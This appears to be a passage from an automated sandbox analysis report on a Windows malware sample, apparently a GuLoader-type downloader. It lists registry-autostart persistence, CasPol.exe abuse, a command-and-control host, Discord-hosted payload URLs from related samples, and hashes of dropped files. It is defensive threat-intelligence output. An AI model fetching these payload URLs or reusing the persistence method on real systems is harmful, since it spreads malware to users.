                              22:56:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Fatigable C:\Users\user\AppData\Local\Temp\RISPENDES\Militrpoliti2.exe
                              22:56:18API Interceptor4273x Sleep call for process: CasPol.exe modified
                              22:56:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Fatigable C:\Users\user\AppData\Local\Temp\RISPENDES\Militrpoliti2.exe
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              23.105.131.228INVOICE.exeGet hashmaliciousBrowse
                                SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.16218.exeGet hashmaliciousBrowse
                                  SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.2317.exeGet hashmaliciousBrowse
                                    Dgc1mwB234.exeGet hashmaliciousBrowse
                                      Sts Global Order.xlsxGet hashmaliciousBrowse
                                        R7nWmIxbbl.exeGet hashmaliciousBrowse
                                          ubwJ8nHmzP.exeGet hashmaliciousBrowse
                                            PO #11325201021.xlsxGet hashmaliciousBrowse
                                              HSBC.exeGet hashmaliciousBrowse
                                                UUGCfhIdFD.exeGet hashmaliciousBrowse
                                                  KPcrOQcb5P.exeGet hashmaliciousBrowse
                                                    rGsJ1mXomJ.exeGet hashmaliciousBrowse
                                                      162.159.129.23364AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                      http://162.159.129.233Get hashmaliciousBrowse
                                                      • 162.159.129.233/favicon.ico
                                                      2lfV6QiE6j.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                                                      SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                                                      1PhgF7ujwW.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                                                      vhNyVU8USk.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                                                      Order 4503860408.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
                                                      cotizacin.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
                                                      SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
                                                      7G5RoevPnu.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
                                                      70% Balance Payment.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
                                                      TT20201712.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                                      ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg
                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      timenamoney.ooguy.comINVOICE.exeGet hashmaliciousBrowse
                                                      • 23.105.131.228
                                                      cdn.discordapp.comhttps://cdn.discordapp.com/attachments/882176715198173197/942881872462102558/Taxslayer.zipGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      methoden.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      Lgcvyhg.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      56516426-056C-4DBA-984B-979F68AB8D18 pdf.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      INVOICE.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      SecuriteInfo.com.W32.AIDetect.malware2.8825.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      dekond.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      QUOTEREQUEST28839423994PDF.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      854F1E97-5DBB-4A87-A566-33D9012B05E2.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      PUCHASE ORDER.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      Quote Req. AN04565L (60683111) from ALBA.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      doc20220524001901029010011.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      56516426-056C-4DBA-984B-979F68AB8D18 pdf.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      csgo aimlock v2.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      56516426-056C-4DBA-984B-979F68AB8D18 pdf.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Inquiry_List & Data sheet.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      Req. Quote_28042022.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      RFQ-SIGNAL S.A 17.05.2022.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      REF AMVK22-3480.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      CLOUDFLARENETUShttps://cdn.discordapp.com/attachments/882176715198173197/942881872462102558/Taxslayer.zipGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      https://www.evernote.com/shard/s365/sh/06bcd4c9-5498-15ca-a1fb-6f351c0a19f0/5ad8b7936c6b5b81fdb1cb4f289565e2Get hashmaliciousBrowse
                                                      • 104.16.123.96
                                                      http://www.primalpowr.co/I9X-azJLDotj5q2m0ij0pAobh8bFMHDMBAX-g_X0nnGA-oAHYgGet hashmaliciousBrowse
                                                      • 104.21.79.99
                                                      https://www.paymentsjournal.com/analysts-coverage/Get hashmaliciousBrowse
                                                      • 104.18.226.52
                                                      https://gilbertogil.com.br/Feedback1.phpGet hashmaliciousBrowse
                                                      • 188.114.96.10
                                                      kyTwt6MpdH.exeGet hashmaliciousBrowse
                                                      • 188.114.97.10
                                                      methoden.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      http://vade4608fb187.qpostie18.com/track/click/SlC9afG1pBGQGsS3nu0U7pxJdsY/1/aHR0cHM6Ly9jbGF0aWQuaW8vd2ViaW5hci9pcnMtZm9ybS13LTQtOTQxLXF1YXJ0ZXItMi1hbmQtMTA5OS1uZWMtaW4tMjAyMg==/Get hashmaliciousBrowse
                                                      • 172.67.38.66
                                                      http://vade4608fb187.qpostie18.com/track/click/SlC9afG1pBGQGsS3nu0U7pxJdsY/1/aHR0cHM6Ly9jbGF0aWQuaW8vd2ViaW5hci9pcnMtZm9ybS13LTQtOTQxLXF1YXJ0ZXItMi1hbmQtMTA5OS1uZWMtaW4tMjAyMg==/Get hashmaliciousBrowse
                                                      • 104.22.24.131
                                                      IVN 725434522.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      https://www.extcovdoc125.org/Get hashmaliciousBrowse
                                                      • 104.18.11.207
                                                      Win32.Wannacry.dllGet hashmaliciousBrowse
                                                      • 104.17.244.81
                                                      SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      https://znap.link/payeeportal8738246Get hashmaliciousBrowse
                                                      • 104.18.6.145
                                                      http://6nreijjndg03nhn.tuarquetipo.com./#aHR0cHM6Ly93d3cuY3ZlZ2ozajg3LnRvcC8/ZW1haWw9YW1pdGFiaGEucmF5QHNjaHJlaWJlcmZvb2RzLmNvbQ==Get hashmaliciousBrowse
                                                      • 104.18.10.207
                                                      https://urlsand.esvalabs.com/?u=https%3A%2F%2Fexpress.adobe.com%2Fpage%2FfeoM5782aYABf%2F&e=d02f10fa&h=34edaf6a&f=y&p=yGet hashmaliciousBrowse
                                                      • 104.17.25.14
                                                      https://na3.docusign.net/Member/EmailStart.aspx?a=e48f9a7e-7630-4f4a-9e73-9ae4c68238d0&acct=6d128e02-3d7d-42e7-b7c2-14e521db149f&er=ca6b7a2d-cdb3-4ab1-8f2e-072215336210Get hashmaliciousBrowse
                                                      • 104.18.11.207
                                                      Invoice_payment_confirmation_567.htmlGet hashmaliciousBrowse
                                                      • 104.18.10.207
                                                      SecuriteInfo.com.W32.AIDetectNet.01.18544.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      PO 2022356 iq.exeGet hashmaliciousBrowse
                                                      • 104.21.85.89
                                                      LEASEWEB-USA-NYC-11USSecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                      • 23.105.131.186
                                                      INVOICE.exeGet hashmaliciousBrowse
                                                      • 23.105.131.228
                                                      SecuriteInfo.com.W32.AIDetect.malware2.8825.exeGet hashmaliciousBrowse
                                                      • 23.105.131.186
                                                      SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.16218.exeGet hashmaliciousBrowse
                                                      • 23.105.131.228
                                                      SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.2317.exeGet hashmaliciousBrowse
                                                      • 23.105.131.228
                                                      Protected Client.vbsGet hashmaliciousBrowse
                                                      • 23.105.131.193
                                                      attack.ps1Get hashmaliciousBrowse
                                                      • 23.105.131.193
                                                      SecuriteInfo.com.Variant.Lazy.184938.5859.exeGet hashmaliciousBrowse
                                                      • 23.105.131.166
                                                      SecuriteInfo.com.Trojan.GenericKDZ.87786.11151.exeGet hashmaliciousBrowse
                                                      • 23.105.131.166
                                                      New Order PO 6784.docGet hashmaliciousBrowse
                                                      • 173.208.96.116
                                                      OCBC_BAN.EXEGet hashmaliciousBrowse
                                                      • 23.105.131.196
                                                      Client.vbsGet hashmaliciousBrowse
                                                      • 23.105.131.220
                                                      Habib Bank_Payment MT103 Copy_Pdf.exeGet hashmaliciousBrowse
                                                      • 23.105.131.196
                                                      armGet hashmaliciousBrowse
                                                      • 23.108.24.185
                                                      Urgent Quotation Ref-JBG11008163382TQO.exeGet hashmaliciousBrowse
                                                      • 23.105.131.196
                                                      Copia de pagamento_ Caixa Geral_Pdf.exeGet hashmaliciousBrowse
                                                      • 23.105.131.196
                                                      Kopija za plakkanje_Komercijalna Banka_Pdf.exeGet hashmaliciousBrowse
                                                      • 23.105.131.196
                                                      uUNHCLItt0.exeGet hashmaliciousBrowse
                                                      • 23.105.131.196
                                                      DOC_BANK.EXEGet hashmaliciousBrowse
                                                      • 23.105.131.206
                                                      Remittance details.xlsGet hashmaliciousBrowse
                                                      • 23.105.131.220
                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19http://akrurl.com/.2zpesGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      TAX DOCUMENT.ppamGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      https://www.paymentsjournal.com/analysts-coverage/Get hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      Chrome.Quick.Update.ver.102.41.49568.jsGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      Chrome.Quick.Update.ver.102.41.49568.jsGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      https://servermail.nicepage.io/Home.htmlGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      https://www.evernote.com/shard/s670/sh/55910dd8-9887-4018-3dce-75c372206cc5/1536ce86c6cb14e023f30a8fc3201040Get hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      kyTwt6MpdH.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      https://www.extcovdoc125.org/Get hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      https://bacguidelines.com/Get hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      https://urlsand.esvalabs.com/?u=https%3A%2F%2Fexpress.adobe.com%2Fpage%2FfeoM5782aYABf%2F&e=d02f10fa&h=34edaf6a&f=y&p=yGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      DOC.003242628829.DOC.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      Invoice_payment_confirmation_567.htmlGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      http://updates.password-update.com/76aaf4998a4ea5a3?l=13Get hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      https://www.ftaviation.com.co/gen/geo.htm#jacques.federspiel@hopitauxschuman.luGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      Endermanch@7ev3n.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      if2pXtt2HC.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      3J2B4N0mFV.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      9A0NWX2qSG.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      C:\Users\user\AppData\Local\Temp\System.Net.Http.dllSecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                                                        SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                          SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                            SecuriteInfo.com.W32.AIDetect.malware2.8825.exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.W32.AIDetect.malware2.8825.exeGet hashmaliciousBrowse
                                                                evilmsi.msiGet hashmaliciousBrowse
                                                                  C:\Users\user\AppData\Local\Temp\Lib.Platform.Windows.Native.dllSecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.W32.AIDetect.malware2.8825.exeGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.W32.AIDetect.malware2.8825.exeGet hashmaliciousBrowse
                                                                            C:\Users\user\AppData\Local\Temp\NMDllHost.exeSecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.W32.AIDetect.malware2.8825.exeGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.W32.AIDetect.malware2.8825.exeGet hashmaliciousBrowse
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):34118
                                                                                      Entropy (8bit):3.9997408239816328
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:hPeYGA4/4T44AIkxk5yz8zngB5jYofJIsFmOuI5jak:vdoQ1kj8zn4dJXmE1
                                                                                      MD5:E143614EC3566CC0867C1A4EAE6E985E
                                                                                      SHA1:0CA1B86A24D7014849351E6241C398CCC38A9650
                                                                                      SHA-256:442D64BCDD603EF97BB1A122EEAB49940B3C2BC151F9661B60BEC5F2D16710A9
                                                                                      SHA-512:11DD351449BAAEE27F78BA026034F75D7A6F58DFFE9B03D368661B42BA2AF79307884433239ED0C26C27195F643FF82975C9C8E41649DECE3078B71A727858C9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:68C02F48AA944BA940275D944375B2A942E62AE09CE595854A63EB849DC0110C74BAFCD8CDF29FC1853F03EFA9480174EA0A5F310767C696BD743193FD7C110562BF576E1716C3A204755A6338A561089ED863ADC722B4AD7CBD53DD6DCF2A6DC8849BC65EFBE91E5C1BD0886E036A034C93FAA7E8007CBD89F89D1C3B37C36258E2D4FBFAEDB4DAA6EDD69D35DBB81D9082B961E71179351C605ED51DDF4FAC5746AEB99D7D645C4B5CE120D98A9F600C913FA77A7E769ADC26B35D26DD323D1347E87E1C8D420E74DCC612C5AF71850EA03FE027AE9FF620B10CD85F0A98EE8C4C1BCB898AA7C970E02E26BDF6ED291998A0D9409217D8FF0B19850AA28E7384C82B2BD205E21A14B85B9191DBE44C80F2E35DE5F1A6FEF88956074C061EB6C22667C65572008D877F713AEDF27D9DF5ACF3CAD646CD7537C7730C8DD39388E71677ACD4E643D44BBD3D914DD5D05EFF4038587961D168E664816ECDE62A59B7EC7F92710E66C54888930E89D3D9342342AC5F9420614E222FFA3F0987845CB779F4EE0F9C4CC1095592C8357933E4CC6B2FB7139335EDB3DD547A78AD41C684E61DB2183E614A286789244CB39684F1EE2DF2D4CF1445142D719E6E7E01609060FC301D50532DB60DEE6E905DBA83F805E7FC91649AD14219888AA21754EB3B6BF3AB70ADB257533EB7E2AB87C11063F02575
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):37
                                                                                      Entropy (8bit):4.540402352056965
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:5CeXAYpqyn:5CeWy
                                                                                      MD5:D5E9EF9561789A05AFB528A1E6C7D9B7
                                                                                      SHA1:B2C92096EE4103A58B41A0754F2E1F1BB823392C
                                                                                      SHA-256:8D2AE334DCB01E0A5EE1F9CA0689E68743E851B96E48A75ED5E20515D03D7FF5
                                                                                      SHA-512:09FC8CF87BA6D12D744D5560B14DC8CFBCE9F9DA4EAAF36C1F6176AA56C0F40129F0B231C373E7BE1206F0209137782615FB60FFCD4A184D5131FD073A658684
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:[Disjunction33]..kanone=BLINDFOLDER..
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):920
                                                                                      Entropy (8bit):2.9814599276151545
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:8wl0gsXUCV/tz+7RafgKDKmY1LmWQ18/rNJkKAh4t2YCBTo8:8vraRMgK0pOS5HALJT
                                                                                      MD5:AA6BC79B220719BD39A82A8A4E4153C6
                                                                                      SHA1:A2659B2897A78A5B32268DA79EBCAA71B04C23E7
                                                                                      SHA-256:44FD1BEE4ED2EB625483C2706DAB8341CAE84D22E043B9B05283A57413221E0A
                                                                                      SHA-512:A5EE3930C7477C51FCD3154AD1F6EFAA5EF10677C76AC6DEA1028627CF69A9AB730F7E248CDB078A78B5C448C76C0A376C8858502351AFACFAA441A0D11E7A58
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F........................................................#....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....\.2...........horla.exe.D............................................h.o.r.l.a...e.x.e...........\.h.o.r.l.a...e.x.e.".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1245
                                                                                      Entropy (8bit):5.462849750105637
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                                      MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                                      SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                                      SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                                      SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):515816
                                                                                      Entropy (8bit):6.444433831771789
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:hY/Hjc0/Lf7vjm4GjDL7ROBM1SMzRJTp4g4D:hY/Dc+LDLmVL7QMx9Np4g4D
                                                                                      MD5:232371076A23379753EB776CF06FBE5D
                                                                                      SHA1:6A5EA5D44E555AD392725E5AC3D80AF0137386E9
                                                                                      SHA-256:5940F9D18B9439ECBFCD6EDC60563D6F56623D03F09EAFA786C436185EF156BB
                                                                                      SHA-512:590F67E8455DCFE57795F17C94E6082B54C1FEAEF81942B1E92EFC7905E3E6B6EC7A05EEF12A8F0483B5DC1928DC9E7645A74BAE31E77F7AC403C64344F09625
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.8825.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.8825.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c..'~..'~..'~....-.1~..f...N~...... ~...y. ~......6~....../~......#~..|...)~..'~...~.....#~.....&~...A.&~.....&~..Rich'~..................PE..d.....J`.........." ................T)....................................................`..........................................l.......l..................(A.......$......0.......p...........................p...8............................................text...F........................... ..`.rdata...q.......r..................@..@.data...H............j..............@....pdata..(A.......B...p..............@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):116720
                                                                                      Entropy (8bit):5.889271571414613
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:g3nqpX2I6OhctR+lCTD01Lcy4J93TnCx86:L2W1oy4J93TCT
                                                                                      MD5:DBF787BD6E5CE77FB34FF281A144EB96
                                                                                      SHA1:50B7799ECCA566BE35429828245D44CB04AD8885
                                                                                      SHA-256:CCBACEEA04837229C95C08274C747ABE069279AFB990DDD89EC743C42ADC0AD9
                                                                                      SHA-512:07949EC3882D9CB6E2341CE60C6E911F24463B01F484C037E65A2A8F3495543A096B632E01F8480D03FF388D1E811ECF760155F97F1D5329785C506603BB18A7
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.8825.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware2.8825.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............u.L.u.L.u.LF.bL.u.LF.aL.u.LF.dL.u.LF.`L.u.L..,L.u.L..<L.u.L.u.L.t.Lu.|L.u.L...L.u.Lu.`L.u.Lu.fL.u.Lu.cL.u.LRich.u.L........PE..L......U..........................................@.......................................@..................................E..........p...........................`...8...........................0&..@............................................text............................... ..`.rdata...N.......P..................@..@.data...p....`.......T..............@....shared..............^..............@....rsrc...p............`..............@..@.reloc...K.......L...d..............@..B................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1000520
                                                                                      Entropy (8bit):7.703306245117382
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:Sbgt9IUnghMeF3HVojgCpaxMiicfJuAJH:4gNngXXujhpaCih
                                                                                      MD5:43DCF57A2E2B4594B5D63C9BD7146467
                                                                                      SHA1:3443118429867E754BDA7CF77B44AC82DA85F18C
                                                                                      SHA-256:3AE3F26BF479F81C188789C06F9D2813CB9F76792C695DA9F90DCA9A600CD7BC
                                                                                      SHA-512:DDC42A04EF127DC6E2DB77755ABE0AFEAD442BECE9242051F7C1790579C3F3BEEFB3A958B64D1BA328F74EC00A2575ECC07342020C262E230B0DE3F1D8FB5CCE
                                                                                      Malicious:false
                                                                                      Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................!t....@.............................................x...........P,...............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...x...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:OpenType font data
                                                                                      Category:dropped
                                                                                      Size (bytes):132096
                                                                                      Entropy (8bit):7.120290023334178
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:r8z0aOC7z/raqtHAGoJaw10xCMZvMfz+7zDxKlJgWbAh2+b:rY7z/GqtgF43Qi7XxKlJhevb
                                                                                      MD5:75D305F30919530A2C49AC362D2E2D34
                                                                                      SHA1:B9EE4ACF9AC299FCADC4A074AEA0C0FD7888AA1D
                                                                                      SHA-256:CF5676ADA0FF425860EE60E3EE7AC4091C568D9FD9E3562D4BC7F06D5A78AD15
                                                                                      SHA-512:6DB2CE736A5F735FCE1AE4D3573E4E03B3E2F605A39280FC30FF28879130B5F4F2BE45C541D30FC6C29718009FEFC40CEFB2E4F267CFAE3ECFBD8949F48CD37B
                                                                                      Malicious:false
                                                                                      Preview:OTTO.......`BASEe.]........FCFF ......FT..|.DSIG............GDEF......@....GPOS......x...8GSUB..]....,...JOS/2.E....P...`cmap.spB......3fhead..h........6hhea.3.....$...$hmtx.:.%.......Bmaxp. P....H....name:,.]........post...3..F4... .........Q.X_.<......................;.:...$.......................X.;.;......................P.. .....X.........X...K...X...^.2.%............ .....8.........ADBO... ............`.............. .....J.~.................................$.............<...........H...........T...........`...........l.........&.~.........&...........*...........6...........D.*.........:.n.....................2...........$.......................D.*.....................,.......................J...........,...........d.\.........(.......................4...........4...........2........... .B.........4.b...........................................................................................................*...........<.........$.N......... .r.........,...........0............
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):204192
                                                                                      Entropy (8bit):6.237429214447198
                                                                                      Encrypted:false
